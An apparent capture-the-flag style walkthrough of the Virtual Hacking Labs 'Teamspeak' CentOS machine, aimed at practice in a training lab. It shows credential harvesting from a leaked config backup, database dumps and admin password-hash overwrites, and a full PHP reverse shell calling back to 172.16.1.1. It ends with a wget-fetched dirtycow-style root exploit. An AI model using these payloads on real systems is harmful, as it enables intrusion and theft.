WriteupsVHL — Teamspeak
MiscMediumLinux
VHL — Teamspeak
TeamSpeak 3 server on CentOS. Enumerated FTP for credentials and exploited a vulnerable web application for system access.
February 15, 2025Virtual Hacking Labs
#TeamSpeak#FTP#CentOS#Service Exploit
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.142
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 01:10 EST
Nmap scan report for 10.11.1.142
Host is up (0.12s latency).
Not shown: 65528 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.2.2
|_ftp-anon: got code 500 "OOPS: cannot change directory:/opt/teamspeak3-server_linux-x86/files/virtualserver_1/".
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 79:93:2b:9c:c0:c7:b0:c1:0a:5f:63:3c:78:eb:2f:40 (DSA)
|_ 2048 0f:67:e8:a7:0a:94:9a:5a:75:35:a3:fe:1f:a3:e2:d3 (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-title: Apache HTTP Server Test Page powered by CentOS
443/tcp open ssl/http Apache httpd 2.2.15 ((CentOS))
| ssl-cert: Subject: commonName=teamspeak/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2016-12-31T12:13:13
|_Not valid after: 2017-12-31T12:13:13
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-robots.txt: 2 disallowed entries
|_/fudforum/ /osclass/
|_ssl-date: 2025-02-15T06:17:52+00:00; +1s from scanner time.
|_http-server-header: Apache/2.2.15 (CentOS)
3306/tcp open mysql MySQL 5.1.73
| mysql-info:
| Protocol: 10
| Version: 5.1.73
| Thread ID: 18
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, ConnectWithDatabase, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, SupportsTransactions, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, InteractiveClient, LongPassword, IgnoreSigpipes, LongColumnFlag, ODBCClient, SupportsCompression, DontAllowDatabaseTableColumn
| Status: Autocommit
|_ Salt: j{OU<m0EJ'!o-1LkWRri
10011/tcp open textui TeamSpeak 3 ServerQuery
30033/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: VoIP adapter|general purpose
Running (JUST GUESSING): Cisco embedded (88%), Linux 2.6.X (88%)
OS CPE: cpe:/h:cisco:unified_call_manager cpe:/o:linux:linux_kernel:2.6.26
Aggressive OS guesses: Cisco Unified Communications Manager VoIP adapter (88%), Linux 2.6.26 (PCLinuxOS) (88%), Linux 2.6.32 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 120.39 ms 10.11.1.142
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 461.39 seconds21
sh
21/tcp open ftp vsftpd 2.2.2
|_ftp-anon: got code 500 "OOPS: cannot change directory:/opt/teamspeak3-server_linux-x86/files/virtualserver_1/".80
sh
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-title: Apache HTTP Server Test Page powered by CentOSdirectory search
sh
[####################] - 34m 1951097/1951097 0s found:1054 errors:776016
[####################] - 29m 30000/30000 17/s http://10.11.1.142/
[####################] - 29m 30000/30000 17/s http://10.11.1.142/osclass/
[####################] - 29m 30000/30000 17/s http://10.11.1.142/fudforum/
[####################] - 5s 30000/30000 6591/s http://10.11.1.142/icons/ => Directory listing
[####################] - 29m 30000/30000 17/s http://10.11.1.142/fudforum/images/
[####################] - 1s 30000/30000 50676/s http://10.11.1.142/fudforum/js/ => Directory listing
[####################] - 1s 30000/30000 38610/s http://10.11.1.142/fudforum/js/ui/ => Directory listing
[####################] - 29m 30000/30000 17/s http://10.11.1.142/fudforum/adm/
[####################] - 1s 30000/30000 28302/s http://10.11.1.142/icons/small/ => Directory listing
[####################] - 29m 30000/30000 17/s http://10.11.1.142/manual/
[####################] - 1s 30000/30000 44978/s http://10.11.1.142/fudforum/images/fonts/ => Directory listing
[####################] - 9s 30000/30000 3208/s http://10.11.1.142/manual/images/ => Directory listing
[####################] - 30m 30000/30000 17/s http://10.11.1.142/manual/misc/
[####################] - 29m 30000/30000 17/s http://10.11.1.142/manual/en/
[####################] - 29m 30000/30000 17/s http://10.11.1.142/fudforum/images/avatars/
[####################] - 30m 30000/30000 17/s http://10.11.1.142/manual/de/
[####################] - 30m 30000/30000 17/s http://10.11.1.142/manual/fr/
[####################] - 1s 30000/30000 50251/s http://10.11.1.142/manual/style/ => Directory listing
[####################] - 1s 30000/30000 52448/s http://10.11.1.142/fudforum/theme/ => Directory listing
[####################] - 3s 30000/30000 11274/s http://10.11.1.142/fudforum/adm/style/ => Directory listing
[####################] - 29m 30000/30000 17/s http://10.11.1.142/manual/en/misc/
[####################] - 30m 30000/30000 17/s http://10.11.1.142/manual/ru/
[####################] - 5s 30000/30000 6620/s http://10.11.1.142/manual/style/css/ => Directory listing
[####################] - 2s 30000/30000 17422/s http://10.11.1.142/manual/style/lang/ => Directory listing
[####################] - 2s 30000/30000 17442/s http://10.11.1.142/manual/style/xsl/ => Directory listing 
sh
unzip Osclass_backup.20170102122648.zip -d Osclass_backupCHANGELOG.txt
sh
cat CHANGELOG.txt
Osclass 3.4.1 2014-08-04
------------------------
- Fixed some compatibility issues with PHP 5.2
- Minor bug fixes and improvementssh
cat config.php
<?php
/**
* The base MySQL settings of Osclass
*/
define('MULTISITE', 0);
/** MySQL database name for Osclass */
define('DB_NAME', 'osclass');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'RootAccount91ow');creds
root:RootAccount91ow
3306
sh
3306/tcp open mysql MySQL 5.1.73
| mysql-info:
| Protocol: 10
| Version: 5.1.73
| Thread ID: 18
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, ConnectWithDatabase, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, SupportsTransactions, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, InteractiveClient, LongPassword, IgnoreSigpipes, LongColumnFlag, ODBCClient, SupportsCompression, DontAllowDatabaseTableColumn
| Status: Autocommit
|_ Salt: j{OU<m0EJ'!o-1LkWRrish
mysql -u root -p'RootAccount91ow' -h 10.11.1.142osclass database
sh
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| fudforum |
| mysql |
| osclass |
+--------------------+
4 rows in set (0.017 sec)sh
MySQL [(none)]> use osclass
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [osclass]> show tables;
+---------------------------+
| Tables_in_osclass |
+---------------------------+
| oc_t_admin |
| oc_t_alerts |
| oc_t_alerts_sent |
| oc_t_ban_rule |
| oc_t_category |
| oc_t_category_description |
| oc_t_category_stats |
| oc_t_city |
| oc_t_city_area |
| oc_t_city_stats |
| oc_t_country |
| oc_t_country_stats |
| oc_t_cron |
| oc_t_currency |
| oc_t_item |
| oc_t_item_comment |
| oc_t_item_description |
| oc_t_item_location |
| oc_t_item_meta |
| oc_t_item_resource |
| oc_t_item_stats |
| oc_t_keywords |
| oc_t_latest_searches |
| oc_t_locale |
| oc_t_locations_tmp |
| oc_t_log |
| oc_t_meta_categories |
| oc_t_meta_fields |
| oc_t_pages |
| oc_t_pages_description |
| oc_t_plugin_category |
| oc_t_preference |
| oc_t_region |
| oc_t_region_stats |
| oc_t_user |
| oc_t_user_description |
| oc_t_user_email_tmp |
| oc_t_widget |
+---------------------------+
38 rows in set (0.017 sec)sh
MySQL [osclass]> select * from oc_t_admin;
+---------+---------------+------------+--------------------------------------------------------------+-------------------------+----------+-------------+
| pk_i_id | s_name | s_username | s_password | s_email | s_secret | b_moderator |
+---------+---------------+------------+--------------------------------------------------------------+-------------------------+----------+-------------+
| 1 | Administrator | admin | $2a$15$7yFZw5/fKNID2hbVnb/6JOxNIhp75pDtN/93bxeVb9xrGeFWwb8s6 | admin@10.11.1.142.local | NULL | 0 |
+---------+---------------+------------+--------------------------------------------------------------+-------------------------+----------+-------------+
1 row in set (0.017 sec)sh
MySQL [osclass]> SELECT LOAD_FILE('/etc/passwd');
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| LOAD_FILE('/etc/passwd') |
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
|
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+- generate
password123blowfish$2a$12$5APmPatM4ji3r767Sk8bEueZR1fE2Rw21NcxMw2heIhu1E/MpklQa
sh
MySQL [osclass]> UPDATE oc_t_admin SET s_password = '$2a$12$5APmPatM4ji3r767Sk8bEueZR1fE2Rw21NcxMw2heIhu1E/MpklQa' WHERE pk_i_id = 1;
fudforum database
sh
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| fudforum |
| mysql |
| osclass |
+--------------------+
4 rows in set (0.016 sec)
MySQL [(none)]> use fudforum;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [fudforum]> show tables;
+-------------------------+
| Tables_in_fudforum |
+-------------------------+
| fud30_action_log |
| fud30_ann_forums |
| fud30_announce |
| fud30_attach |
| fud30_avatar |
| fud30_blocked_logins |
| fud30_bookmarks |
| fud30_buddy |
| fud30_calendar |
| fud30_cat |
| fud30_custom_fields |
| fud30_custom_tags |
| fud30_email_block |
| fud30_ext_block |
| fud30_fc_view |
| fud30_fl_1 |
| fud30_fl_2 |
| fud30_fl_3 |
| fud30_fl_pg |
| fud30_fl_pm |
| fud30_forum |
| fud30_forum_notify |
| fud30_forum_read |
| fud30_geoip |
| fud30_group_cache |
| fud30_group_members |
| fud30_group_resources |
| fud30_groups |
| fud30_index |
| fud30_ip_block |
| fud30_jobs |
| fud30_karma_rate_track |
| fud30_level |
| fud30_mime |
| fud30_mlist |
| fud30_mod |
| fud30_msg |
| fud30_msg_report |
| fud30_msg_store |
| fud30_nntp |
| fud30_pages |
| fud30_plugins |
| fud30_pmsg |
| fud30_poll |
| fud30_poll_opt |
| fud30_poll_opt_track |
| fud30_read |
| fud30_replace |
| fud30_search |
| fud30_search_cache |
| fud30_ses |
| fud30_smiley |
| fud30_spiders |
| fud30_stats_cache |
| fud30_themes |
| fud30_thr_exchange |
| fud30_thread |
| fud30_thread_notify |
| fud30_thread_rate_track |
| fud30_title_index |
| fud30_tv_1 |
| fud30_tv_2 |
| fud30_tv_3 |
| fud30_user_ignore |
| fud30_users |
| fud30_xmlagg |
+-------------------------+
66 rows in set (0.021 sec)sh
MySQL [fudforum]> use fud30_users;
ERROR 1049 (42000): Unknown database 'fud30_users'
MySQL [fudforum]> select * from fud30_users;
+----+-----------+-----------+------------------------------------------+-----------+---------------+-------------------------+----------+-----------+------------+--------+-------------------------------------------------------------------------+------+------+-------+------+--------+--------+--------+-------+---------+-----------+------------------+----------+------------+----------------------------------+-----------+------------+-------+------------------+------------+------------+------------+---------------+------+----------+-------+----------------+-----------+------+---------------------+--------------+------------+-------------+-------------------+------------+----------------------------------+-----------------+--------------+------------+-----------------+------------+---------+--------------+---------------+
| id | login | alias | passwd | salt | name | email | location | interests | occupation | avatar | avatar_loc | icq | aim | yahoo | msnm | jabber | affero | google | skype | twitter | posts_ppg | time_zone | birthday | join_date | conf_key | reset_key | user_image | theme | posted_msg_count | last_visit | referer_id | last_read | custom_status | sig | level_id | karma | u_last_post_id | home_page | bio | cat_collapse_status | custom_color | buddy_list | ignore_list | group_leader_list | users_opt | sq | registration_ip | last_used_ip | ban_expiry | topics_per_page | last_login | flag_cc | flag_country | custom_fields |
+----+-----------+-----------+------------------------------------------+-----------+---------------+-------------------------+----------+-----------+------------+--------+-------------------------------------------------------------------------+------+------+-------+------+--------+--------+--------+-------+---------+-----------+------------------+----------+------------+----------------------------------+-----------+------------+-------+------------------+------------+------------+------------+---------------+------+----------+-------+----------------+-----------+------+---------------------+--------------+------------+-------------+-------------------+------------+----------------------------------+-----------------+--------------+------------+-----------------+------------+---------+--------------+---------------+
| 1 | Anonymous | Anonymous | 1 | NULL | Anonymous | dev@null | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | America/New_York | NULL | 1483355387 | NULL | NULL | NULL | 1 | 0 | 0 | 0 | 0 | NULL | NULL | 0 | 0 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 4488117 | NULL | ::1 | ::1 | 0 | 40 | 0 | NULL | NULL | NULL |
| 2 | admin | admin | 6e70a4585a317ad3753391124636a087c98184f6 | 186317a0f | Administrator | apache@10.11.1.142 | NULL | NULL | NULL | 3 | <img src="images/avatars/smiley03.jpg" alt="" width="64" height="64" /> | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | America/New_York | NULL | 1483355387 | NULL | NULL | NULL | 1 | 2 | 1483377470 | 0 | 0 | Administrator | NULL | 3 | 0 | 5 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 13777910 | 226d8805... | ::1 | 172.16.1.1 | 0 | 40 | 1739606203 | NULL | NULL | NULL |
| 3 | Google | Google | 6e70a4585a317ad3753391124636a087c98184f6 | 186317a0f | Googlebot | Google@fud_spiders | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | America/New_York | NULL | 1483355387 | NULL | NULL | NULL | 1 | 0 | 0 | 0 | 0 | NULL | NULL | 0 | 0 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 1715893141 | NULL | ::1 | ::1 | 0 | 40 | 0 | NULL | NULL | NULL |
| 4 | Yahoo | Yahoo | 6e70a4585a317ad3753391124636a087c98184f6 | 186317a0f | Yahoo! | Yahoo@fud_spiders | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | America/New_York | NULL | 1483355387 | NULL | NULL | NULL | 1 | 0 | 0 | 0 | 0 | NULL | NULL | 0 | 0 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 1715893141 | NULL | ::1 | ::1 | 0 | 40 | 0 | NULL | NULL | NULL |
| 5 | Bing | Bing | 6e70a4585a317ad3753391124636a087c98184f6 | 186317a0f | Bing | Bing@fud_spiders | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | America/New_York | NULL | 1483355387 | NULL | NULL | NULL | 1 | 0 | 0 | 0 | 0 | NULL | NULL | 0 | 0 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 1715893141 | NULL | ::1 | ::1 | 0 | 40 | 0 | NULL | NULL | NULL |
| 6 | Bob | Bob | 7eb2cfb5aab709e44a0d0882f11d42e969e50ce8 | 1680ab3d2 | | bob@bob.local | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 40 | America/New_York | NULL | 1483355872 | c6bd867a... | NULL | NULL | 1 | 1 | 1483355927 | 0 | 1483355872 | NULL | NULL | 3 | 0 | 3 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 4357110 | 23476319... | 172.16.1.1 | 172.16.1.1 | 0 | 40 | 1483355892 | NULL | NULL | |
| 7 | Samantha | Samantha | 321b4e68f55efc4595dcc09a573391a250cfb811 | 7bd030dd8 | | samantha@samantha.local | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 40 | America/New_York | NULL | 1483356039 | 08e1fc4a... | NULL | NULL | 1 | 1 | 1483377427 | 0 | 1483356039 | NULL | NULL | 3 | 0 | 4 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 4357110 | d217a5da... | 172.16.1.1 | 172.16.1.1 | 0 | 40 | 1483377411 | NULL | NULL | |
+----+-----------+-----------+------------------------------------------+-----------+---------------+-------------------------+----------+-----------+------------+--------+-------------------------------------------------------------------------+------+------+-------+------+--------+--------+--------+-------+---------+-----------+------------------+----------+------------+----------------------------------+-----------+------------+-------+------------------+------------+------------+------------+---------------+------+----------+-------+----------------+-----------+------+---------------------+--------------+------------+-------------+-------------------+------------+----------------------------------+-----------------+--------------+------------+-----------------+------------+---------+--------------+---------------+
7 rows in set (0.023 sec)
- register a new user
- check the database and replace the passwd and salt for admin
sh
MySQL [fudforum]> UPDATE fud30_users SET passwd = 'd979570205b509107f024cd0d4c563e3f9ccbb30' WHERE id = 2;
Query OK, 1 row affected (0.020 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MySQL [fudforum]> UPDATE fud30_users SET salt = 'cedadea50' WHERE id = 2;
Query OK, 1 row affected (0.020 sec)
Rows matched: 1 Changed: 1 Warnings: 0
php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '172.16.1.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?> - place a reverse shell from pentestmonkey
sh
nc -lnvp 80
listening on [any] 80 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.142] 60007
Linux teamspeak 2.6.32-573.el6.i686 #1 SMP Thu Jul 23 12:37:35 UTC 2015 i686 i686 i386 GNU/Linux
13:08:47 up 12:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$ whoami
whoami
apachesh
python -c 'import pty; pty.spawn("/bin/bash")'priv esc
linpeas
sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/gcc
/usr/bin/gdb
/usr/bin/make
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.6
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
gcc.i686 4.4.7-17.el6 @base
/usr/bin/gccsh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 2.6.32-573.el6.i686 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Thu Jul 23 12:37:35 UTC 2015
LSB Version: :base-4.0-ia32:base-4.0-noarch:core-4.0-ia32:core-4.0-noarch:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-ia32:printing-4.0-noarch
Distributor ID: CentOS
Description: CentOS release 6.7 (Final)
Release: 6.7
Codename: Final
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.6p3sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc -O2 25444.c -o 25444sh
bash-4.1$ wget http://172.16.1.1/40839.csh
bash-4.1$ gcc -pthread 40839.c -o 40839 -lcryptsh
bash-4.1$ ./40839
./40839
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: rooted
Complete line:
firefart:fik43qBvLQn4.:0:0:pwned:/root:/bin/bash
mmap: b776a000
sh
bash-4.1$ su firefart
su firefart
Password: rooted
[firefart@teamspeak tmp]# whoami
whoami
firefart
[firefart@teamspeak tmp]# cat /root/key.txt
cat /root/key.txt
5iuz6e8ktzuyhhtitvhn
[firefart@teamspeak tmp]# date
date
Sat Feb 15 13:38:10 EST 2025
Up next
MediumFeb 2025
VHL — Trace
IIS 10.0 running Kartris eCommerce on Windows. SQL injection and .NET deserialization chain leads to code execution and privilege escalation.
Read writeup
EasyFeb 2025
HTB — Titanic
Flask app path traversal via download endpoint reads arbitrary files including admin credentials. Magick ImageMagick CVE-2024-41817 for root shell.
Read writeup
EasyFeb 2025
VHL — Core
Legacy Ubuntu server with Apache 2.2 and Dovecot POP3. Enumerated mail service for credentials enabling SSH access to root.
Read writeup